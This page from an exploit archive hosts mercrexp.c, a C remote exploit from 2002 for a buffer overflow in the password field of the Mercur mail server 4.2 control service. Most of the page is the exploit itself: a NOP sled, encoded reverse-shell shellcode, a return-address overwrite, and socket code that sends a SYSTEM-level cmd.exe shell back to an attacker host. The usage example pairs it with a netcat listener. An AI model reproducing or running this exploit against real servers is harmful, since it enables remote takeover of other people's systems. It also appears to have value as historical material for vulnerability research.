mercrexp.c

mercrexp.c: Posted Jul 18, 2002; Authored by 2c79cbe14ac7d0b8472d3f129fa1df55; Mercur mail server v4.2 remote exploit. The Mercur mail server's control service listens to tcp port 32000 and is vulnerable to a buffer overflow in the password field. Tested against Windows 2000 and XP pro. Sends a shell to port 3333.; tags | exploit, remote, overflow, shell, tcp; systems | windows; SHA-256 | 5d47b93de6b6b5e44524436f14aa61eeae568221c556a2a9290570d4db621bef; Download | Favorite | View

mercrexp.c

/*
  mercrexp.c (7/16/2002)

  # ./mercrexp 192.168.0.2 32000 192.168.1.2 3333
  # nc -l -p 3333
  Microsoft Windows 2000 [Version 5.00.2195]
  (C) Copyright 1985-2000 Microsoft Corp.
  
  E:\WINNT\system32>  

  2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)  
*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>

// CALL EBX; mcrctrl.exe@0x228e
#define EIP "\x8e\x2c\x40\x00"

// payload.. dumped into remote memory as failed 'username'
// dark spyrit's shell, ripped from jill.c
unsigned char shell[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90"
    "\x90\x90\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95"
    "\x40\xe2\xfa\x2d\x95\x95\x64\xe2\x14\xad\xd8\xcf\x05\x95"
    "\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95\xc8\x1e\x40\x14"
    "\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
    "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3"
    "\xc2\xc4\x1e\xaa\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66"
    "\x33\xe1\x9d\xcc\xca\x16\x52\x91\xd0\x77\x72\xcc\xca\xcb"
    "\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6\x5c\xf3"
    "\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95"
    "\x96\x56\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d"
    "\xe1\x94\x95\x95\xa6\x55\x39\x10\x55\xe0\x6c\xc7\xc3\x6a"
    "\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95\x7d\xce\x94\x95"
    "\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
    "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5"
    "\x18\xd2\x85\xc5\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18"
    "\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18\xd2\x89\xc5\x6a\xc2\x55"
    "\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a\xc2\x51"
    "\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2"
    "\xcd\x14\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95"
    "\x18\xd2\xe5\xc5\x18\xd2\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff"
    "\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14\x78\xd5\x6b\x6a"
    "\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
    "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45"
    "\x1e\x7d\xc5\xfd\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a"
    "\x10\x3f\x95\x95\x95\xa6\x55\xc5\xd5\xc5\xd5\xc5\x6a\xc2"
    "\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d\xf3\x52"
    "\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d"
    "\x95\x94\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a"
    "\xc2\x49\xa6\x5c\xc4\xc3\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2"
    "\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15\xab\x95\xe1\xba"
    "\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
    "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff"
    "\x95\x6a\xa3\xc0\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05"
    "\x05\x05\x05\x7e\x27\xff\x95\xfd\x95\x91\x95\x95\xc0\xc6"
    "\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1\x09\xff"
    "\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2"
    "\x49\x7e\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55"
    "\x39\x10\x55\xe0\x6c\xc4\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e"
    "\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6\xd4\xf1\xf1\xe7"
    "\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
    "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95"
    "\xd2\xf0\xe1\xc6\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa"
    "\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xe7\xfa\xf6\xf0\xe6"
    "\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1\xc5\xfc"
    "\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6"
    "\x95\xc2\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4"
    "\xf1\xd3\xfc\xf9\xf0\x95\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed"
    "\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95\xd6\xf9\xfa\xe6"
    "\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
    "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6"
    "\xfa\xf6\xfe\xf0\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6"
    "\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb\xf0\xf6\xe1\x95\xe6\xf0"
    "\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb\xf0\xed"
    "\xf0\x95\x0a";

// fake user
unsigned char user[] = "\x78\x78\x78\x78\x0a";

// ebp/eip overwrite
unsigned char passwd[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x03\xde\x83\xc3\x02\xff\xd3\xc3\x10"EIP""
    "\x0a";

main(char argc, char **argv){
        int fd;
        int bufsize = 1024;
        int buffer = malloc(bufsize);
        unsigned short int      a_port;
        unsigned long           a_host;
        struct sockaddr_in sin;
        struct hostent *he;
        struct in_addr in;

  printf("MERCUR Mailserver 4.2.0.0 remote 'SYSTEM' level exploit (07/16/2002)\n");
        printf("2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)\n\n");

        if (argc < 5){
                printf("usage: %s <targethost> <controlport> <localhost> <localport>\n", argv[0]);
                printf("  controlport: MERCUR Control-Service port (default 32000)\n\n");
    printf("NOTE: tested against win2k and winxp pro..\n\n");
                exit(-1);
        }

  // riiiiiiip
        a_port  = htons(atoi(argv[4]));
        a_port ^= 0x9595;
        if ((he = gethostbyname(argv[3])) == 0){herror(argv[3]);exit(-1);}
        a_host  = *((unsigned long *)he->h_addr);
        a_host ^= 0x95959595;
        shell[1113] = ((a_port) & 0xff);
        shell[1114] = ((a_port >> 8) & 0xff);        
        shell[1118] = ((a_host) & 0xff);
        shell[1119] = ((a_host >> 8) & 0xff);
        shell[1120] = ((a_host >> 16) & 0xff);
        shell[1121] = ((a_host >> 24) & 0xff);

        if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror("socket error");exit(-1);}

        if ((he = gethostbyname(argv[1])) != NULL){memcpy (&in, he->h_addr, he->h_length);}
        else
        if ((inet_aton(argv[1], &in)) < 0){printf("unable to resolve host");exit(-1);}

        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = inet_addr(inet_ntoa(in));
        sin.sin_port = htons(atoi(argv[2]));

  printf("ret: 0x00402c8e (mrcctrl.exe v.4.2.1.0)\n\n");
 
        printf("connecting to tcp port %s...\n", argv[2]);
        if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){perror("connection error");exit(-1);}
 
        printf("connected.\n\n");
   sleep(1);
  printf("dumping payload...");
        if(write(fd, shell, strlen(shell)) < strlen(shell)){perror("write error");exit(-1);}
  printf("done\n");
        sleep(1);
        printf("sending fake login...");
        if(write(fd, user, strlen(user)) < strlen(user)){perror("write error");exit(-1);}
        printf("done\n");
  sleep(1);
  printf("eip overrun...");
  if(write(fd, passwd, strlen(passwd)) < strlen(passwd)){perror("write error");exit(-1);}
  printf("done\n\n");

  printf("cmd.exe spawned to [%s:%s]\n\n", argv[3], argv[4]);

        close(fd);

}

Top Authors In Last 30 Days

Red Hat 205 files
Ubuntu 84 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

mercrexp.c

mercrexp.c

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

mercrexp.c

Share This

mercrexp.c

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems